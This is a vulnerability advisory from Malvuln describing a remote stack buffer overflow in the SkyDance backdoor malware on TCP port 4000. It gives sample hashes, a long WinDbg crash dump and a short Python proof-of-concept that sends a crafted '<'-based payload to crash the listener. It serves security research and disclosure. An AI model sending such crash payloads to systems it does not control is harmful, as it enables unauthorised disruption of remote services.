Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/694ecf256c97ef6e206e2073d37e5944.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.SkyDance.216
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 4000. Third-party attackers who can reach an infected system can trigger a buffer overflow by sending a specially crafted packet. Interestingly, one specific character "\x3c" the "<" symbol seems required to trigger the overflow.
Type: PE32
MD5: 694ecf256c97ef6e206e2073d37e5944
Vuln ID: MVID-2021-0222
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 05/22/2021

Memory Dump:
(10c8.1240): Stack buffer overflow - code c0000409 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=00418b8f edx=00000001 esi=00000000 edi=00000002
eip=77aeed3c esp=0019c9f0 ebp=0019ca30 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000216
ntdll!ZwWaitForMultipleObjects+0xc:
77aeed3c c21400          ret     14h

0:000> .ecxr
eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c edi=00000001
eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
kernel32!InterlockedDecrementStub+0xb:
776f72cb f00fc101        lock xadd dword ptr [ecx],eax ds:002b:00418b8f=ffff80f6
*** WARNING: Unable to verify checksum for Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************


FAULTING_IP: 
kernel32!InterlockedDecrementStub+b
776f72cb f00fc101        lock xadd dword ptr [ecx],eax

EXCEPTION_RECORD:  0019cbf0 -- (.exr 0x19cbf0)
ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000008
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 00418b8f
Attempt to write to address 00418b8f

PROCESS_NAME:  Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0019cc40 -- (.cxr 0x19cc40)
eax=ffffffff ebx=0019fc80 ecx=00418b8f edx=00000001 esi=0019d12c edi=00000001
eip=776f72cb esp=0019d0a0 ebp=0019d0a0 iopl=0         nv up ei ng nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
kernel32!InterlockedDecrementStub+0xb:
776f72cb f00fc101        lock xadd dword ptr [ecx],eax ds:002b:00418b8f=ffff80f6
Resetting default scope

WRITE_ADDRESS:  00418b8f 

FOLLOWUP_IP: 
Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8
00410bf8 85c0            test    eax,eax

FAULTING_THREAD:  00001240

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff

LAST_CONTROL_TRANSFER:  from 00410bf8 to 776f72cb

STACK_TEXT:  
0019d0a0 00410bf8 00418b8f 0019d12c 00410c7c kernel32!InterlockedDecrementStub+0xb
WARNING: Stack unwind information not available. Following frames may be wrong.
0019d130 00401d06 025177c4 00000000 0019fd14 Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x10bf8
00418b9b b8e8e900 ccccfffe cccccccc cccccccc Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d06
00418b9f ccccfffe cccccccc cccccccc 0c4d8dcc 0xb8e8e900
00418ba3 cccccccc cccccccc 0c4d8dcc ff80d1e9 0xccccfffe
00418ba7 cccccccc 0c4d8dcc ff80d1e9 084d8dff 0xcccccccc
00418bab 0c4d8dcc ff80d1e9 084d8dff ff80c9e9 0xcccccccc
00418baf ff80d1e9 084d8dff ff80c9e9 044d8dff 0xc4d8dcc
00418bb3 084d8dff ff80c9e9 044d8dff ff80c1e9 0xff80d1e9
00418bb7 ff80c9e9 044d8dff ff80c1e9 d178b8ff 0x84d8dff
00418bbb 044d8dff ff80c1e9 d178b8ff bbe90041 0xff80c9e9
00418bbf ff80c1e9 d178b8ff bbe90041 ccfffeb8 0x44d8dff
00418bc3 d178b8ff bbe90041 ccfffeb8 cccccccc 0xff80c1e9
00418bc7 bbe90041 ccfffeb8 cccccccc cccccccc 0xd178b8ff
00418bcb ccfffeb8 cccccccc cccccccc cccccccc 0xbbe90041
00418bcf cccccccc cccccccc cccccccc 084d8dcc 0xccfffeb8
00418bd3 cccccccc cccccccc 084d8dcc ff80a1e9 0xcccccccc
00418bd7 cccccccc 084d8dcc ff80a1e9 044d8dff 0xcccccccc
00418bdb 084d8dcc ff80a1e9 044d8dff ff8099e9 0xcccccccc
00418bdf ff80a1e9 044d8dff ff8099e9 c88d8dff 0x84d8dcc
00418be3 044d8dff ff8099e9 c88d8dff e9fffffe 0xff80a1e9
00418be7 ff8099e9 c88d8dff e9fffffe ffff808e 0x44d8dff
00418beb c88d8dff e9fffffe ffff808e fecc8d8d 0xff8099e9
00418bef e9fffffe ffff808e fecc8d8d 83e9ffff 0xc88d8dff
00418bf3 ffff808e fecc8d8d 83e9ffff b8ffff80 0xe9fffffe
00418bf7 fecc8d8d 83e9ffff b8ffff80 0041d1b0 0xffff808e
00418bfb 83e9ffff b8ffff80 0041d1b0 feb87de9 0xfecc8d8d
00418bff b8ffff80 0041d1b0 feb87de9 044d8dff 0x83e9ffff
00418c03 0041d1b0 feb87de9 044d8dff ff8071e9 0xb8ffff80
00418c07 feb87de9 044d8dff ff8071e9 f04d8dff Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+0x1d1b0
0041d1b0 00000000 0041d1d0 00000000 00000000 0xfeb87de9


SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944

IMAGE_NAME:  Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  38f4751e

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; .cxr 0x19cc40 ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_ffffffff_c0000409_Backdoor.Win32.SkyDance.216.694ecf256c97ef6e206e2073d37e5944.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_FILL_PATTERN_ffffffff_MISSING_GSFRAME_Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+10bf8

Followup: MachineOwner
---------

0:000> .exr -1
ExceptionAddress: 776f72cb (kernel32!InterlockedDecrementStub+0x0000000b)
   ExceptionCode: c0000409 (Stack buffer overflow)
  ExceptionFlags: 00000008
NumberParameters: 1
   Parameter[0]: 00000015

0:000> !exchain
0019caa8: ntdll!_except_handler4+0 (77af6a50)
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (77b357ad)
0019d128: Backdoor_Win32_SkyDance_216_694ecf256c97ef6e206e2073d37e5944+18b9b (00418b9b)
Invalid exception stack at 02515790

0:000> !address 02515790
                        
Usage:                  Heap
Allocation Base:        02510000
Base Address:           02510000
End Address:            0251f000
Region Size:            0000f000
Type:                   00020000	MEM_PRIVATE
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
More info:              heap containing the address: !heap 0x2510000
More info:              heap entry containing the address: !heap -x 0x2515790


Exploit/PoC:
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=4000

def doit():

    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="\x3cc"*900 +" HTTP/1.1"
    s.send(PAYLOAD)
    s.close()
    
    print("Backdoor.Win32.SkyDance.216 / Remote Stack Buffer Overflow")
    print("MD5: 694ecf256c97ef6e206e2073d37e5944")
    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).